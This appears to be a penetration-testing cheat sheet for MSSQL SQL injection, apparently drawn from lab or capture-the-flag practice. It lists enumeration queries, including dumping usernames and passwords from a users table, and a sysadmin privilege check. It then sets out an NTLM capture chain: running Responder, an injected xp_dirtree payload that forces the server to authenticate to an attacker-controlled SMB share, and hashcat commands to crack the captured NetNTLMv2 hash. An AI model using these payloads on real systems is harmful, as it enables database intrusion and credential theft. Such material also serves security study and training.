PRIMARY CATEGORY → SQLi
DB Information
Current Database User
SELECT USER_NAME();Current Database
SELECT DB_NAME();Databases
SELECT name FROM sys.databases;Table
SELECT name FROM <DATABASE>.sys.tables;
SELECT table_name FROM <DATABASE>.information_schema.tables;Columns
SELECT column_name FROM <DATABASE>.information_schema.columns WHERE table_name='<TABLE>';Data
SELECT <COLUMN> FROM <DATABASE>.<SCHEMA>.<TABLE>;e.g.
SELECT username, password FROM streamio_backup.dbo.users;
Privileges and Roles
SELECT IS_SRVROLEMEMBER('sysadmin');Read Files
🛠️⌛
System
Web Application
Write Files
🛠️⌛
Command Execution
NTLM Capture / Relay Primitives
NTLM Capture
See NTLM Capture
Setting up the SMB Server
From the attacker ⚔️
Setup
git clone https://github.com/lgandx/Responder Responder
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txtUsage
python3 Responder.py --interface '<NET_IFACE>'Forcing SMB Authentication
From the Webapp 🎯
q=' AND 1=1 ; use master ; exec xp_dirtree '\\<ATTACKER_IP>\<SHARE>' -- -e.g.
q=' AND 1=1 ; use master ; exec xp_dirtree '\\10.10.10.15\smbFolder' -- -
Cracking NetNTLMv2 Response
From the attacker ⚔️
hashcat --force -O --attack-mode 0 --hash-type 5600 <HASH_FILE> <WORDLIST>e.g.
hashcat --force -O --attack-mode 0 --hash-type 5600 hash /usr/share/wordlists/rockyou.txt